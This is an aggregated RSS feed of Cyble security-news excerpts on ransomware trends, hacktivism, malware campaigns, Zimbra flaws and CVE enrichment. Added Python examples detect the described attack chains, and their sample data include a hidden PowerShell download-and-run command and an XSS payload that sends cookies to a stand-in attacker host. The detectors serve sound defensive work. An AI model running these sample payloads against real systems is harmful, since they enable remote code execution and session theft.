www.secnews.physaphae.fr
This is the RSS 2.0 feed from www.secnews.physaphae.fr. It is a simple aggregated flow of multiple article sources. The list of sources can be found on www.secnews.physaphae.fr.
Feed generated: 2025-05-10T20:55:01+00:00

Cyble - CyberSecurity Firm: Ransomware Attacks April 2025: Qilin Emerges from Chaos
Global ransomware attacks in April 2025 declined to 450 from 564 in March, the lowest level since November 2024, as major changes among the leading Ransomware-as-a-Service (RaaS) groups caused many affiliates to align with new groups. Still, the long-term trend for ransomware attacks remains decidedly upward (chart below), so April's decline could be reversed as soon as new RaaS leaders are established.
[Chart: Ransomware attacks by month, 2021-2025]
For now, the uncertainty at RansomHub, which went offline at the start of April but plans to return, resulted in new groups taking over the top global attack spots. Qilin, which gained affiliates from the RansomHub uncertainty, led all groups with 74 attacks claimed in April (chart below), followed by Akira at 70, Play with 50, Lynx with 31, and NightSpire at 24.
Published: 2025-05-06T14:17:39+00:00 | Source: https://cyble.com/blog/qilin-tops-april-2025-ransomware-report/ | Aggregator: www.secnews.physaphae.fr/article.php?IdArticle=8672355 | Tags: Ransomware, Malware, Vulnerability, Threat, Industrial, Prediction, Medical, Cloud, Technical

Cyble - CyberSecurity Firm: Hacktivists Target Critical Infrastructure, Move Into Ransomware
Overview: According to a new Cyble report, hacktivists are increasingly moving beyond traditional activities such as DDoS attacks and website defacements into more sophisticated critical infrastructure and ransomware attacks.
In a report for clients, Cyble said that hacktivism has "transformed into a complex instrument of hybrid warfare" with the rise of groups that have adopted more sophisticated attack techniques, ones more commonly associated with nation-state actors and financially motivated threat groups. Hacktivism "is no longer confined to fringe ideological outbursts," according to the report. "It is now a decentralized cyber-insurgency apparatus, capable of shaping geopolitical narratives, destabilizing critical systems, and engaging directly in global conflicts through the digital domain." The Cyble report examined the most active hacktivist groups in the first quarter of 2025, the most targeted nations and sectors, emerging attack techniques, and more.
The most active hacktivist groups target critical infrastructure: Pro-Russian hacktivists were the most active in the first quarter, led by NoName057(16), Hacktivist Sandworm
Published: 2025-04-15T08:22:39+00:00 | Source: https://cyble.com/blog/hacktivists-infrastructure-move-into-ransomware/ | Aggregator: www.secnews.physaphae.fr/article.php?IdArticle=8662999 | Tags: Ransomware, Tool, Vulnerability, Threat, Legislation, Industrial, Prediction, Cloud, Technical | Actor: APT 44

Cyble - CyberSecurity Firm: DOGE "Big Balls" Ransomware and the False Connection to Edward Coristine
Key Takeaways
This attack leverages a ZIP file with a deceptive LNK shortcut to silently execute a multi-stage PowerShell-based infection chain, ensuring stealthy deployment.
A vulnerable driver (CVE-2015-2291) is exploited through a Bring Your Own Vulnerable Driver (BYOVD) technique to gain kernel-level read/write access for privilege escalation.
The payload is a customized version of Fog ransomware, branded as "DOGE BIG BALLS Ransomware," reflecting an attempt to add psychological manipulation and misattribution.
Ransomware scripts include provocative political commentary and the use of a real individual's name and address, indicating intent to confuse, intimidate, or mislead victims.
The malware collects router MAC addresses (BSSIDs) and queries the Wigle.net API to determine the victim's physical location, which gives more accurate geolocation than IP-based methods.
Extensive system and network information, including hardware IDs, firewall states, network configuration, and running processes, is collected via PowerShell, aiding attacker profiling.
Embedded within the toolkit is a Havoc C2 beacon, hinting at the threat actor's (TA's) potential to maintain long-term access or conduct additional post-encryption activities.
Overview: A recent ransomware operation has revealed a blend of technical sophistication and psychological manipulation, setting it apart from conventional attacks. Disguised under a finance-themed ZIP file, the campaign employs deceptive shortcut files and multi-stage PowerShell scripts to deliver custom payloads, including a kernel-mode exploit tool and reconnaissance modules. This layered approach allows attackers to gat
Published: 2025-04-14T12:58:44+00:00 | Source: https://cyble.com/blog/doge-big-balls-ransomware-edward-coristine/ | Aggregator: www.secnews.physaphae.fr/article.php?IdArticle=8662673 | Tags: Ransomware, Spam, Malware, Tool, Threat, Cloud, Technical

Cyble - CyberSecurity Firm: FizzBuzz to FogDoor: Targeted Malware Campaign Exploits Job-Seeking Developers
A social engineering campaign targets unsuspecting developers through a malicious GitHub-hosted lure.
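The ZIP-then-LNK-then-PowerShell chain in the DOGE "Big Balls" item above leaves a recognizable trail in endpoint telemetry: a hidden PowerShell window spawned by explorer.exe, a working directory inside the temporary folder Windows uses for files opened straight out of a ZIP, a driver loaded from a user-writable path, reconnaissance commands, and an outbound lookup to the Wigle.net API. The following Python is an added example, not code from the article or from Cyble; the event lines are constructed Sysmon-style records, the driver filename iqvw64e.sys for CVE-2015-2291 comes from public reporting rather than the article, and the specific recon commands are assumptions about what "firewall states, network configuration, and running processes" collection looks like on the wire.

```python
import re
from collections import defaultdict

# Constructed Sysmon-style telemetry for one compromised workstation (ws01) and one
# clean one (ws02): (host, event_id, fields). Event 1 = process create,
# 6 = driver load, 3 = network connect. None of these lines come from the article.
EVENTS = [
    ("ws01", 1, {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "ParentImage": r"C:\Windows\explorer.exe",
                 "CurrentDirectory": r"C:\Users\a\AppData\Local\Temp\Temp1_Pay_Adjustment.zip",
                 "CommandLine": 'powershell.exe -w hidden -ep bypass -c "iwr http://198.51.100.7/s1.ps1|iex"'}),
    ("ws01", 1, {"Image": r"C:\Windows\System32\netsh.exe",
                 "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "CurrentDirectory": r"C:\Users\a",
                 "CommandLine": "netsh wlan show networks mode=bssid"}),
    ("ws01", 6, {"ImageLoaded": r"C:\Users\a\AppData\Local\Temp\iqvw64e.sys"}),
    ("ws01", 3, {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "DestinationHostname": "api.wigle.net", "DestinationPort": 443}),
    ("ws02", 1, {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "ParentImage": r"C:\Windows\System32\cmd.exe",
                 "CurrentDirectory": r"C:\Users\admin",
                 "CommandLine": "powershell.exe Get-Service"}),
    ("ws02", 6, {"ImageLoaded": r"C:\Windows\System32\drivers\storahci.sys"}),
]

# LNK lures launch PowerShell with a hidden window and often an encoded command.
PS_HIDDEN = re.compile(r"-(?:w|windowstyle)\s+hidden|-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)
# Explorer extracts archive members to %TEMP%\Temp1_<archive>.zip\ when a file is opened straight from a ZIP.
ZIP_TEMP = re.compile(r"\\Temp\\Temp1_[^\\]+\.zip", re.I)
# CVE-2015-2291 is the Intel Ethernet diagnostics driver iqvw64e.sys (public reporting,
# not stated in the article). Extend this set from a BYOVD driver list as needed.
KNOWN_VULN_DRIVERS = {"iqvw64e.sys"}
# Commands that match the profiling the article lists (BSSIDs, firewall state, network
# config, processes). The exact commands are assumed, not quoted from the malware.
RECON = re.compile(r"netsh\s+wlan\s+show|Get-NetFirewallProfile|Get-NetIPConfiguration|Get-Process\b|Get-CimInstance\s+Win32_", re.I)
USER_WRITABLE = re.compile(r"\\(?:Users|Temp|ProgramData)\\", re.I)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def indicators(events):
    """Return {host: sorted indicator names} for every host with at least one hit."""
    found = defaultdict(set)
    for host, event_id, f in events:
        if event_id == 1:
            cmd = f.get("CommandLine", "")
            if (basename(f.get("Image", "")) == "powershell.exe"
                    and basename(f.get("ParentImage", "")) == "explorer.exe"
                    and PS_HIDDEN.search(cmd)):
                found[host].add("hidden_powershell_from_explorer")
            if ZIP_TEMP.search(f.get("CurrentDirectory", "")):
                found[host].add("launched_from_zip_temp")
            if RECON.search(cmd):
                found[host].add("host_network_recon")
        elif event_id == 6:
            driver = f.get("ImageLoaded", "")
            if basename(driver) in KNOWN_VULN_DRIVERS:
                found[host].add("known_vulnerable_driver_loaded")
            if USER_WRITABLE.search(driver):
                found[host].add("driver_from_user_writable_path")
        elif event_id == 3:
            if f.get("DestinationHostname", "").lower().endswith("wigle.net"):
                found[host].add("bssid_geolocation_lookup")
    return {host: sorted(names) for host, names in found.items()}


def chain_verdict(names):
    """Alert only when the LNK-style launch is joined by at least two later stages, so a
    lone hidden PowerShell window (common in admin tooling) does not page anyone."""
    return "hidden_powershell_from_explorer" in names and len(names) >= 3


if __name__ == "__main__":
    for host, names in indicators(EVENTS).items():
        print(host, "ALERT" if chain_verdict(names) else "review", names)
```

The driver-load checks are deliberately two separate indicators: a known-bad filename catches this campaign, while "driver loaded from a user-writable path" catches the next BYOVD driver before anyone has catalogued it.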
Using a fake recruitment test named "FizzBuzz", the TA lures victims into downloading an ISO file containing a seemingly harmless JavaScript exercise and a malicious LNK shortcut
Published: 2025-03-24T11:09:37+00:00 | Source: https://cyble.com/blog/fake-coding-challenges-steal-sensitive-data-via-fogdoor/ | Aggregator: www.secnews.physaphae.fr/article.php?IdArticle=8657753 | Tags: Malware, Tool, Vulnerability, Threat, Technical

Cyble - CyberSecurity Firm: SQLi, XSS, and SSRF: Breaking Down Zimbra's Latest Security Threats
Overview: Zimbra Collaboration Suite (ZCS) is a widely used email and collaboration platform, and its security is a priority for the administrators and users who rely on it for business communication. Zimbra has recently addressed several critical security issues, including stored cross-site scripting (XSS), SQL injection (SQLi), and server-side request forgery (SSRF). This article gives a technical breakdown of these vulnerabilities, their potential impact, and recommended actions.
1. Stored Cross-Site Scripting (XSS) - CVE-2025-27915
Affected Versions: ZCS 9.0 before Patch 44, 10.0 before 10.0.13, and 10.1 before 10.1.5
Patch Availability: Fixed in the latest patches
Description: This vulnerability resides in the Classic Web Client and is caused by insufficient sanitization of HTML content in ICS calendar invite files. Attackers can embed malicious JavaScript inside an ICS file, and it executes when a victim opens an email containing the ICS entry. Exploitation allows unauthorized actions within the victim's session, such as modifying email filters to redirect messages to an attacker's inbox.
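The ICS stored-XSS case above is a reminder that calendar invites are HTML delivery vehicles: an attacker only needs a text-bearing property (most often the vendor extension X-ALT-DESC with FMTTYPE=text/html) that the web client renders as markup. The Python below is an added example, not code from the article or from Zimbra, showing a mail-gateway check that unfolds an invite per RFC 5545, flags active HTML content in the properties a client renders, and strips the HTML alternates while a patch is pending. The invite is constructed for the example; the property list and the markup patterns are this example's assumptions about what a webmail client renders, not a description of Zimbra's sanitizer.

```python
import html
import re

# Constructed calendar invite (not from the article) whose HTML alternate description
# carries an inline event handler, the kind of markup the ZCS fix now sanitizes.
SAMPLE_ICS = """BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//constructed example//EN
BEGIN:VEVENT
UID:evt-1@example.invalid
DTSTART:20250401T090000Z
SUMMARY:Quarterly review
DESCRIPTION:Agenda attached.
X-ALT-DESC;FMTTYPE=text/html:<html><body>Agenda<img src=x onerror="fetch('
 https://attacker.invalid/?c='+document.cookie)"></body></html>
END:VEVENT
END:VCALENDAR
"""

# Properties a webmail client shows as (rich) text, so markup inside them reaches the
# browser. X-ALT-DESC is the common vendor extension for an HTML body. Assumed list.
TEXT_PROPS = {"DESCRIPTION", "X-ALT-DESC", "SUMMARY", "LOCATION", "COMMENT"}
ACTIVE_CONTENT = re.compile(
    r"<\s*(?:script|iframe|object|embed|svg|math)\b"  # elements that run or load code
    r"|\bon[a-z]+\s*="                                 # inline handlers such as onerror=
    r"|javascript\s*:"                                 # script URLs
    r"|<\s*(?:img|link|style|meta|form)\b",            # resource loads, style and form injection
    re.I,
)


def unfold(ics_text):
    """Undo RFC 5545 line folding: a line break followed by one space or tab."""
    return re.sub(r"\r?\n[ \t]", "", ics_text)


def content_lines(ics_text):
    """Yield (NAME, params, value) per content line. Quoted parameter values with an
    embedded colon (e.g. ALTREP="http://...") are not handled by this simple split."""
    for line in unfold(ics_text).splitlines():
        if ":" not in line:
            continue
        head, _, value = line.partition(":")
        name, _, params = head.partition(";")
        yield name.upper(), params, value


def risky_properties(ics_text):
    """Return [(property, first suspicious token)] for rendered properties that carry
    active HTML content."""
    hits = []
    for name, params, value in content_lines(ics_text):
        if name in TEXT_PROPS or "FMTTYPE=TEXT/HTML" in params.upper():
            match = ACTIVE_CONTENT.search(value)
            if match:
                hits.append((name, match.group(0)))
    return hits


def strip_html_alternates(ics_text):
    """Gateway-side mitigation while patching: drop HTML alternate descriptions and
    HTML-escape the remaining text properties so the client has no markup to render.
    Output lines are left unfolded; re-fold to 75 octets if a strict consumer needs it."""
    out = []
    for line in unfold(ics_text).splitlines():
        head, sep, value = line.partition(":")
        name, _, params = head.partition(";")
        if name.upper() == "X-ALT-DESC" or "FMTTYPE=TEXT/HTML" in params.upper():
            continue
        if name.upper() in TEXT_PROPS:
            value = html.escape(value, quote=True)
        out.append(head + sep + value)
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    print("before:", risky_properties(SAMPLE_ICS))
    print("after: ", risky_properties(strip_html_alternates(SAMPLE_ICS)))
```

Unfolding first matters: the sample splits `fetch('https://...` across a folded line, and a scanner that inspects raw lines never sees the assembled URL or handler.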
Published: 2025-03-18T13:50:51+00:00 | Source: https://cyble.com/blog/breaking-down-zimbras-latest-security-threats/ | Aggregator: www.secnews.physaphae.fr/article.php?IdArticle=8656463 | Tags: Vulnerability, Industrial, Technical

Cyble - CyberSecurity Firm: Three VMware Zero-Days Under Active Exploitation – What You Need to Know
Published: 2025-03-10T12:10:47+00:00 | Source: https://cyble.com/blog/three-vmware-zero-days-under-active-exploitation/ | Aggregator: www.secnews.physaphae.fr/article.php?IdArticle=8654866 | Tags: Vulnerability, Threat, Patching, Cloud, Technical

Cyble - CyberSecurity Firm: Germany is Strengthening Cybersecurity with Federal-State Collaboration and Digital Violence Prevention
BSI Expands Cybersecurity Cooperation with Hamburg: Germany continues to strengthen its cybersecurity framework as the Federal Office for Information Security (BSI) and the Free and Hanseatic City of Hamburg formalize their collaboration. The agreement, signed on February 7 at Hamburg City Hall, establishes a structured approach to cyber threat intelligence sharing, incident response coordination, and awareness initiatives for public sector employees.
BSI Vice President Dr. Gerhard Schabhüser stressed the urgency of strengthening cybersecurity across federal and state levels: "In view of the worrying threat situation in cyberspace, Germany must become a cyber nation. State administrations and municipal institutions face cyberattacks daily. Attacks on critical infrastructure threaten social order. Germany is a target of cyber sabotage and espionage. Our goal is to enhance cybersecurity nationwide. To achieve this, we must collaborate at both federal and state levels."
This partnership is part of a broader federal initiative, with BSI having previously signed cooperation agreements with Saxony, Saxony-Anhalt, Lower Saxony, Hesse, Bremen, Rhineland-Palatinate, and Saarland.
These agreements provide a constitutional framework for joint cyber defense efforts, strategic advisory services, and rapid response measures following cyber incidents.
With cyber threats growing in complexity, state-level cooperation plays a vital role in reinforcing Germany's cybersecurity resilience, ensuring that government agencies, public sector institutions, and critical infrastructure operators have the tools and expertise to prevent, detect, and mitigate cyber threats effectively.
Addressing Digital Violence: Days later, on February 11, BSI hosted "BSI in Dialogue: Cybersecurity and Digital Violence" in Berlin, bringing together representatives from politics, industry, academia, and civil society to address the growing risks associated with digital violence in an increasingly interconnected world.
While cybercriminals typically operate remotely, digital violence introduces a different kind of threat, in which attackers exploit personal relationships, home technologies, and social connections to manipulate, monitor, or harm individuals. This includes: Unauthorized access to smart home device
Published: 2025-02-14T12:07:49+00:00 | Source: https://cyble.com/blog/germany-strengthening-cybersecurity/ | Aggregator: www.secnews.physaphae.fr/article.php?IdArticle=8648472 | Tags: Tool, Vulnerability, Threat, Technical

Cyble - CyberSecurity Firm: New Zealand's National Cyber Security Centre (NCSC) Reports Surge in Cyber Threats and Vulnerabilities
Overview: The 2023/24 Cyber Threat Report from New Zealand's National Cyber Security Centre (NCSC), led by Lisa Fong, Deputy Director-General for Cyber Security at the Government Communications Security Bureau (GCSB), sheds light on the country's rapidly changing cyber threat landscape. The report highlights an increase in cyber incidents targeting individuals, businesses, and critical national sectors, underlining the growing complexity of cyber threats.
For the year ending June 2024, the NCSC recorded a total of 7,122 cybersecurity incidents, a new milestone since CERT NZ's integration into the NCSC. Of these, 95% (6,799) were handled through the NCSC's general triage process. They primarily affected small to medium businesses and individual users and resulted in reported financial losses of $21.6 million. While these incidents did not require specialized technical intervention, they still had a substantial impact on those affected, particularly in terms of financial loss and reputational damage.
A smaller subset of 343 incidents was categorized as being of national significance. These were more complex and targeted critical infrastructure or large organizations. Among them, 110 were linked to state-sponsored actors, a slight increase in activity from such groups. Financially motivated cybercriminal activity accounted for 65 of these high-impact incidents, underscoring the persistent threat from attacks such as ransomware and data exfiltration.
2023/24 Cyber Threat Report: State-Sponsored Cyber Threats and Ransomware
Published: 2025-02-12T10:33:38+00:00 | Source: https://cyble.com/blog/ncsc-reports-surge-in-cyber-threats-and-vulnerabilities/ | Aggregator: www.secnews.physaphae.fr/article.php?IdArticle=8648178 | Tags: Ransomware, Tool, Vulnerability, Threat, Technical

Cyble - CyberSecurity Firm: EFCC Witness Exposes Shocking Details of Cyber Terrorism and Internet Fraud Scheme
Overview: In a highly anticipated trial on February 7, 2025, Rowland Turaki, a former employee of the accused, Xiao Hong Will, a Chinese national, took the stand as the first prosecution witness in the ongoing case concerning alleged cyber terrorism and internet fraud. The trial, which is being heard at the Federal High Court in Ikoyi, Lagos, is centered on Xiao Hong Will and his company, Genting International Co.
Limited, both facing serious charges related to cybercrimes, identity theft, and fraud. The witness, who was studying cybersecurity at the time, described in detail how his employers instructed him to pose as a woman to gain the trust of potential targets for fraudulent schemes.
According to Turaki, he was employed by Genting International, a company allegedly linked to a network of cybercriminals engaged in elaborate internet fraud operations. The company is accused of using deceptive tactics, including employing Nigerian youths for identity theft and cyber-terrorism activities aimed at destabilizing Nigeria's constitutional structure.
The Arrest of Xiao Hong Will: Xiao Hong Will, arrested during the EFCC's "Eagle Flush Operation" in Lagos on December 19, 2024, is charged with a series of crimes under the Cybercrimes (Prohibition, Prevention, Etc.) Act, 2015 (As Amended, 2024). He and his company allegedly facilitated the exploitation of victims by using fraudulent identities and cryptocurrency schemes to gain financial advantage. The prosecution has charged Hong Will and Genting International with using Nigerian youths to create fake personas, potential
Published: 2025-02-11T11:23:25+00:00 | Source: https://cyble.com/blog/efcc-witness-details-cyber-terrorism/ | Aggregator: www.secnews.physaphae.fr/article.php?IdArticle=8648026 | Tags: Threat, Legislation, Medical, Technical

Cyble - CyberSecurity Firm: Five Eyes Cyber Agencies Share New Security Guidelines for Edge Device Manufacturers
Overview: The rise in cyber threats targeting edge devices has prompted the cybersecurity agencies of the UK, Australia, Canada, New Zealand, and the United States to release new guidelines aimed at strengthening the security of these critical network components. The recommendations urge manufacturers to integrate robust forensic and logging features by default, making it easier to detect and investigate intrusions.
As cybercriminals and state-sponsored actors continue to exploit vulnerabilities in edge devices, organizations must adopt these security measures to mitigate risks. "In the face of a relentless wave of intrusions involving network devices globally, our new guidance sets what we collectively see as the standard required to meet the contemporary threat," said NCSC Technical Director Ollie Whitehouse. "In doing so we are giving manufacturers and their customers the tools to ensure products not only defend against cyberattacks but also provide investigative capabilities required post intrusion."
Understanding Edge Device Security Risks: Edge devices, including routers, IoT sensors, security cameras, and smart appliances, act as critical gateways between local networks and the internet. These devices are often deployed with minimal security features, making them attractive targets for attackers who exploit vulnerabilities to gain unauthorized access, disrupt services, or maintai
Published: 2025-02-06T10:44:52+00:00 | Source: https://cyble.com/blog/new-security-guidelines-edge-device-manufacturers/ | Aggregator: www.secnews.physaphae.fr/article.php?IdArticle=8647186 | Tags: Tool, Vulnerability, Threat, Technical

Cyble - CyberSecurity Firm: United Against Cybercrime: ASEAN Ministers Forge New Security Pathways
Overview: The digital world in Southeast Asia is evolving rapidly, with nations striving to balance innovation, inclusivity, and security. The recently held 5th ASEAN Digital Ministers' Meeting (ADGMIN) in Bangkok, Thailand, marked a significant milestone in this journey. The meeting highlighted the importance of cybersecurity in shaping a resilient digital future for the region. The ASEAN Digital Masterplan 2025 (ADM 2025) continues to serve as a guiding framework for fostering collaboration, enabling trust in digital services, and promoting the safe and inclusive use of technology.
From addressing online scams to operationalizing the ASEAN Regional Computer Emergency Response Team (CERT) and advancing AI governance, the event showcased ASEAN's commitment to fortifying its digital ecosystem against cyber threats. With an emphasis on collaboration and proactive measures, the meeting highlighted the pressing need to enhance cybersecurity frameworks, strengthen cross-border data governance, and address emerging challenges posed by technologies like generative AI.
Key Cybersecurity Highlights
ASEAN Regional CERT Operationalization: One of the significant milestones discussed was the operationalization of the ASEAN Regional Computer Emergency Response Team (CERT). This initiative aims to enhance collaboration among member states, facilitate real-time information sharing, and strengthen the region's preparedness against cyberattacks. CERT's operationalization highlights ASEAN's focus on collective resilience in cyberspace.
Tackling Online Scams: Online scams remain a pressing issue across ASEAN. The ASEAN Working Group on Anti-Online Scams (WG-AS) released its Report on Online Scams Activities in ASEAN (2023–2024), offering insights into the threat landscape. The report outlines key recommendations for regional collaboration to combat scams effectively. The ASEAN Recommendations on Anti-Online Scams provide a framework for governments to develop policies aimed at mitigating online fraud, with a focus on cross-border scams and fraudulent activities exploiting digital platforms.
Promoting Responsible State Behavior in Cyberspace: ASEAN adopted the Checklist for Responsible State Behavior in Cyberspace, aligning with global norms to promote peace and security online. This initiative focuses on fostering cooperation and ensuring responsible use of digital tools while mitigating risks.
Strengthening Cross-Border Data Governance: Data governance was another key topi
Published: 2025-01-27T12:16:17+00:00 | Source: https://cyble.com/blog/united-against-cybercrime-asean-ministers-forge-new-security-pathways/ | Aggregator: www.secnews.physaphae.fr/article.php?IdArticle=8643314 | Tags: Ransomware, Tool, Vulnerability, Threat, Technical

Cyble - CyberSecurity Firm: Unlocking Vulnrichment: Enhancing CVE Data for Smarter Vulnerability Management
Overview: The Cybersecurity and Infrastructure Security Agency (CISA) has introduced Vulnrichment, an initiative designed to enhance CVE data by adding context, scoring, and detailed analysis. Launched on May 10, 2024, Vulnrichment aims to give security professionals more than basic CVE information: the insights needed to make informed, timely decisions about vulnerability management.
As part of a mid-year update, CISA's Tod Beardsley, Vulnerability Response Section Chief, provides an overview of how this resource can be leveraged to improve vulnerability management.
For IT defenders and vulnerability management teams, Vulnrichment represents a significant advancement in how CVE data is presented and used. By enriching basic CVE records with metadata such as Stakeholder-Specific Vulnerability Categorization (SSVC) decision points, Common Weakness Enumeration (CWE) IDs, and Common Vulnerability Scoring System (CVSS) scores, Vulnrichment turns raw CVE data into a more actionable and comprehensive resource.
No additional setup is required. The enriched data is integrated directly into the CVE feeds security teams already consume: whether you pull CVE records from the CVE Program site at https://cve.org or from GitHub at https://github.com/CVEProject/cvelistV5, you are already receiving the enriched records that Vulnrichment provides.
How Vulnrichment Enhances CVE Data: CISA's Vulnrichment is designed to provide a deeper layer of insight into each CVE, helping security professionals prioritize vulnerabilities with greater clarity. As an example, take CVE-2023-45727, which CISA has added to its Known Exploited Vulnerabilities (KEV) catalog. To check the exploitation status of this CVE, query the SSVC decision points carried in the Vulnrichment ADP (Authorized Data Publisher) container of the record. With the command-line tool jq, for instance, you can extract the "Exploitation" decision point, which states whether the vulnerability is actively exploited, has a public proof of concept, or has no known exploitation.
Parsing the ADP container yields this enriched data, which supports an informed decision on whether to prioritize this vulnerability over others. Such context-rich CVE data provides valuable intelligence for vulnerability management, enabling teams to prioriti
Published: 2025-01-24T14:40:40+00:00 | Source: https://cyble.com/blog/cisa-reveals-vulnrichment-management-for-cve-data/ | Aggregator: www.secnews.physaphae.fr/article.php?IdArticle=8642102 | Tags: Tool, Vulnerability, Threat, Patching, Technical
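The jq query described in the Vulnrichment item above reads one field out of the record's ADP container; a vulnerability management pipeline usually wants the same walk done for every record it ingests and turned into a triage decision. The Python below is an added example, not code from the article, from CISA or from the CVE Program: it parses a constructed CVE JSON 5.x record whose container layout (containers.cna, containers.adp[], and metrics[].other.type values of "ssvc" and "kev") follows the public record format and CISA's ADP, pulls out the SSVC decision points, KEV membership, CVSS and CWE data, and ranks the record. The field values in the record are placeholders, not the real CVE-2023-45727 data, and the P1/P2/P3 ordering is this example's own policy.

```python
import json

# Constructed CVE JSON 5.x record cut down to what this example reads. The values are
# stand-ins and are not the real CVE-2023-45727 record.
RECORD = json.loads("""
{
  "cveMetadata": {"cveId": "CVE-2023-45727", "state": "PUBLISHED"},
  "containers": {
    "cna": {
      "descriptions": [{"lang": "en", "value": "constructed placeholder description"}]
    },
    "adp": [
      {
        "title": "CISA ADP Vulnrichment",
        "providerMetadata": {"shortName": "CISA-ADP"},
        "metrics": [
          {"other": {"type": "ssvc", "content": {
            "role": "CISA Coordinator", "version": "2.0.3",
            "options": [{"Exploitation": "active"},
                        {"Automatable": "no"},
                        {"Technical Impact": "partial"}]}}},
          {"other": {"type": "kev", "content": {
            "dateAdded": "2024-01-01",
            "reference": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog"}}},
          {"cvssV3_1": {"version": "3.1", "baseScore": 7.5, "baseSeverity": "HIGH",
                        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}}
        ],
        "problemTypes": [{"descriptions": [
          {"type": "CWE", "cweId": "CWE-611", "description": "placeholder CWE text"}]}]
      }
    ]
  }
}
""")


def _containers(record):
    """The CNA container followed by every ADP container, in record order."""
    containers = record.get("containers", {})
    return [containers.get("cna", {})] + list(containers.get("adp", []))


def ssvc_decisions(record):
    """Flatten the SSVC decision points from the ADP containers into one dict.
    jq equivalent of the query the article describes:
      .containers.adp[].metrics[].other | select(.type=="ssvc") | .content.options[]"""
    points = {}
    for adp in record.get("containers", {}).get("adp", []):
        for metric in adp.get("metrics", []):
            other = metric.get("other", {})
            if other.get("type") == "ssvc":
                for option in other.get("content", {}).get("options", []):
                    points.update(option)
    return points


def in_kev(record):
    """True when any ADP container carries a KEV metric."""
    return any(metric.get("other", {}).get("type") == "kev"
               for adp in record.get("containers", {}).get("adp", [])
               for metric in adp.get("metrics", []))


def cvss_base(record):
    """Highest CVSS base score from CNA or ADP, across whichever versions are present."""
    scores = [metric[key]["baseScore"]
              for container in _containers(record)
              for metric in container.get("metrics", [])
              for key in ("cvssV4_0", "cvssV3_1", "cvssV3_0")
              if key in metric and "baseScore" in metric[key]]
    return max(scores) if scores else None


def cwe_ids(record):
    return sorted({d["cweId"]
                   for container in _containers(record)
                   for pt in container.get("problemTypes", [])
                   for d in pt.get("descriptions", [])
                   if d.get("cweId")})


def priority(record):
    """Triage order (this example's policy): SSVC exploitation state first, then KEV
    membership, with CVSS only as the fallback when neither says anything."""
    exploitation = ssvc_decisions(record).get("Exploitation", "none")
    if exploitation == "active" or in_kev(record):
        return "P1-patch-now"
    if exploitation == "poc" or (cvss_base(record) or 0) >= 9.0:
        return "P2-this-cycle"
    return "P3-backlog"


if __name__ == "__main__":
    cve = RECORD["cveMetadata"]["cveId"]
    print(cve, ssvc_decisions(RECORD), "KEV" if in_kev(RECORD) else "", cvss_base(RECORD), cwe_ids(RECORD), priority(RECORD))
```

Note that the sample record lands in P1 with a CVSS of only 7.5: that is the point of reading the ADP container, since exploitation evidence outranks a base score that was assigned before anyone knew the bug was being used.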